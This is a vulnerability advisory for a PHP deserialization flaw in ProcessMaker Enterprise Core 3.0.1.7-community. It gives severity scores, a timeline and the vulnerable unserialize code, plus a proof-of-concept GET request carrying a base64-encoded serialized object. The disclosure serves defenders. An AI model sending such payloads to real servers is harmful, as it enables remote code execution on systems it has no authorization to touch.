CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
42.2%
A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.
ProcessMaker Enterprise Core 3.0.1.7-community
<https://www.processmaker.com/community-2>
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-502 - Deserialization of Untrusted Data
It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.
The following Proof Of Concept request demonstrate the issue:
GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php?
d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ==
HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login?
u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo
Connection: close
The following code was found to be responsible for unsafe deserialization:
26 if (array_key_exists("d", $_GET)) {
27 $_POST = unserialize(base64_decode($_GET["d"]));
28
29 }
30
31 if (! isset ($_POST)) {
32 G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login');
33 }
34 if (isset($_SESSION['sysLogin'])) {
35 $_POST['form'] = $_SESSION['sysLogin'];
36 }
37
38 require_once 'authentication.php';
39
Restrict access to known, trusted users and hosts.
2016-04-28 - Vendor Disclosure
2017-07-19 - Public Release
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
42.2%